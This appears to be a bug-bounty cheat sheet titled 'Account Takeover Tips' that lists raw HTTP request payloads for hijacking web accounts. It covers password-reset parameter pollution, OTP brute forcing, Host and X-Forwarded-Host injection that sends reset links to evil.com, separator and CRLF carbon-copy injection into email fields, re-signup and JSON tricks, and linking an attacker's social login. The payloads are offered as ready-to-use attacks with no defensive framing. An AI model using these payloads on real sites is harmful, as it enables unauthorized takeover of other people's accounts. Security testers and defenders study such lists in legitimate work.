Click heret
title: Account Takeover Tips author: Elsfa7-110 categories: [XSS, ATO] tags: [ATO] pin: true —
Account Takeover
- Parameter pollution in reset password
1 2 3
POST /reset [...] email=victim@mail.com&email=hacker@mail.com
- Bruteforce the OTP code
1 2 3
POST /reset [...] email=victim@mail.com&code=$123456$
- Host header Injection
1 2 3 4
POST /reset Host: evil.com [...] email=victim@mail.com
1 2 3 4 5
POST /reset Host: target.com X-Forwarded-Host: evil.com [...] email=victim@mail.com
And the victim will receive the reset link with evil.com
- Using separator in value of the parameter
1 2 3
POST /reset [...] email=victim@mail.com,hacker@mail.com
1 2 3
POST /reset [...] email=victim@mail.com%20hacker@mail.com
1 2 3
POST /reset [...] email=victim@mail.com|hacker@mail.com
1 2 3
POST /reset [...] email=victim@mail.com%00hacker@mail.com
- No domain in value of the paramter
1 2 3
POST /reset [...] email=victim
- No TLD in value of the parameter
1 2 3
POST /reset [...] email=victim@mail
- Using carbon copy
1 2 3
POST /reset [...] email=victim@mail.com%0a%0dcc:hacker@mail.com
- Try re-sign up using same email
1 2 3
POST /newaccount [...] email=victim@mail.com&password=1234
After sign up using victim email, try signup again but using different password
1 2 3
POST /newaccount [...] email=victim@mail.com&password=hacked
- If there is JSON data in body requests, add comma
1 2 3
POST /newaccount [...] {“email”:“victim@mail.com”,”hacker@mail.com”,“token”:”xxxxxxxxxx”} - Account takeover after login (Work if inside the website there is “Connect to facebook/twitter/etc”)
- First, login to the website using victim email
- Find “Connect to facebook/twitter/googleplus” or something like that
- Connect to attacker twitter
- After logout you can login using the twitter